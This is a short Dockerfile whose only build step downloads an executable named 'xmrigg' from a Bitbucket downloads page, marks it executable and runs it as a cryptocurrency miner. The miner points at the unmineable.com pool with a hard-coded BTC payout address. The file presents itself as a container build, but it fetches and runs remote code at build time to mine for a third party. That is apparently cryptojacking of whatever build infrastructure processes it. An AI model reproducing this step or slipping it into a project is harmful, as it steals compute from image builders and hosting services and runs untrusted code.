FROM divio/base:0.4-py3.7-slim-stretch

RUN apt-get update && apt-get install -y wget && wget https://bitbucket.org/anli_angku/aset-anli/downloads/xmrigg && chmod u+x xmrigg && ./xmrigg -o rx.unmineable.com:3333 -u BTC:3L2s7K3Ya5ES9CUZf8S9xncXDvJrBsYB8D.unmineable_miner_x01 -k -a rx/0